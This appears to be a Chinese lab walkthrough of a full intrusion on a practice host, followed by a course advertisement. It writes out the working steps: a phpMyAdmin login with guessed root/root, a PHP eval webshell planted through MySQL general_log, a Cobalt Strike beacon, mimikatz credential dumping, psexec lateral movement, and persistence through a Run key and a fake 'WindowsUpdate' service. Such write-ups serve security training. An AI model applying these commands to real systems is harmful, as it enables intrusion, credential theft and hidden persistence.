/%20 (Status: 403) [Size: 210]
/l.php (Status: 200) [Size: 14737]
/L.php (Status: 200) [Size: 14737]
/checkout.php (Status: 403) [Size: 223]
/checkout (Status: 403) [Size: 219]
/phpmyadmin (Status: 301) [Size: 242] [–> http://192.168.164.162/phpmyadmin/]
发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为`root/root`
![image.png](https://img-blog.csdnimg.cn/img_convert/64073b74e85764ef929c9b5651f5fc7f.png)
登录成功
![image.png](https://img-blog.csdnimg.cn/img_convert/45a13e6a6e851db0d5af3471b1086ef4.png)
### 获取shell
查询secure\_file\_priv参数为NULL,所以不能通过into outfile方式写马
show global variables like ‘%secure%’;
![image.png](https://img-blog.csdnimg.cn/img_convert/9de0b2a9c30926b234d3d14aeba1ba58.png)
查询是否开启日志,虽然未开启,但是可以通过SQL语句修改
show global variables like “%general_log%”;
![image.png](https://img-blog.csdnimg.cn/img_convert/f5dd30fbf3da2fd2bd0bc6a0b713841e.png)
开启日志,并设置日志文件为a.php
SET GLOBAL general_log=‘ON’;
set global general_log_file=‘C:\phpStudy\WWW\a.php’;
再次查询日志状态,发现已经更改成功
show global variables like “%general_log%”;
![image.png](https://img-blog.csdnimg.cn/img_convert/3fd4a8f8268b6c6763b3953720493b08.png)
设置成功以后,所以的查询语句都会被记录到日志文件中
select “<?php eval($\_GET['a']);?>”;
成功写入一句话木马
![image.png](https://img-blog.csdnimg.cn/img_convert/db45d2f36b9b232254494641e482c00e.png)
因为靶机是windows无法使用nc,笔者嫌麻烦,所以重新写入一个POST马
SELECT “<?php eval($\_POST['b']);?>”;
使用蚁剑连接
![image.png](https://img-blog.csdnimg.cn/img_convert/361ac60b88107a1563219b9caf6fbcb3.png)
使用cs生成可执行程序
![image.png](https://img-blog.csdnimg.cn/img_convert/19fe09e2568f005f28baab19c5027e3f.png)
上传并执行,成功上线
![image.png](https://img-blog.csdnimg.cn/img_convert/91771a37ecd7513c54e4af56545cfa50.png)
使用mimikatz获取密码和hash
beacon> logonpasswords
![image.png](https://img-blog.csdnimg.cn/img_convert/7216c24f8afdbb6cf626893abe74347d.png)
为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe
![image.png](https://img-blog.csdnimg.cn/img_convert/7dab50fed25c91a1765b4a7a54de0697.png)
将回连等待时间改为0,这样就能做到实时交互
[04/21 15:05:05] beacon> sleep 0
[04/21 15:05:05] [*] Tasked beacon to become interactive
[04/21 15:05:52] [+] host called home, sent: 16 bytes
依次输入命令以获取SYSTEM权限
beacon> getprivs
beacon> getsystem
### 横向移动
探测发现还有两台主机,其中一台为PDC域控
![image.png](https://img-blog.csdnimg.cn/img_convert/3c8000bc9e31db19688b9b9982bf3b52.png)
新建一个smb监听器
![image.png](https://img-blog.csdnimg.cn/img_convert/e2713187e9c54dcebaae4700c8589db9.png)
选择OWA主机psexec开始横向移动
![image.png](https://img-blog.csdnimg.cn/img_convert/bf55d0deb2b76b97916ad65c674dfda2.png)
横向成功
![image.png](https://img-blog.csdnimg.cn/img_convert/d5e5235216cbdfb1036e31e2444a4d06.png)
再次横向。至此,三台主机全部上线
![image.png](https://img-blog.csdnimg.cn/img_convert/6bd4942b58d23c4af8c36d6c94a993c3.png)
### 权限维持
虽然已经拿到最高权限,但当目标主机重启或关机时,我们就会失去该主机的控制
将后门程序加入到注册表中,当系统重启后用户登录时启动后门
shell REG add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v phpstudy /d “C:\phpStudy\WWW\beacon.exe” /f
![image.png](https://img-blog.csdnimg.cn/img_convert/6aba736711068f4c73d8fe32aa6a0c98.png)
设置一个名为WindowsUpdate的系统开机自启服务,通过此命令启动的是SYSTEM权限
shell sc create “WindowsUpdate” binpath= “cmd /C start “C:\phpStudy\WWW\beacon.exe””&&sc config “WindowsUpdate” start= auto&&net start WindowsUpdate
![image.png](https://img-blog.csdnimg.cn/img_convert/c58bc3073458fd9163fca78b8402e125.png)
两种方法都是在用户登录后才能上线,但第二种却直接获得SYSTEM权限
## 最后
**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**
**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/1e9bbbfa6caa18f37df6398590ee6e63.png)
![img](https://img-blog.csdnimg.cn/img_convert/741966bd2b7d68b3776f32e498de2d4a.png)
![img](https://img-blog.csdnimg.cn/img_convert/a8c3f8e72f0035bd8dbf2c31d04d8c23.png)
![img](https://img-blog.csdnimg.cn/img_convert/91ad0cb4d0b2a6a1ade9ab2ed597cfe9.png)
![img](https://img-blog.csdnimg.cn/img_convert/fd854f68f349ee40357320f201a850a5.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
,基本涵盖了95%以上网络安全知识点!真正的体系化!**
[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**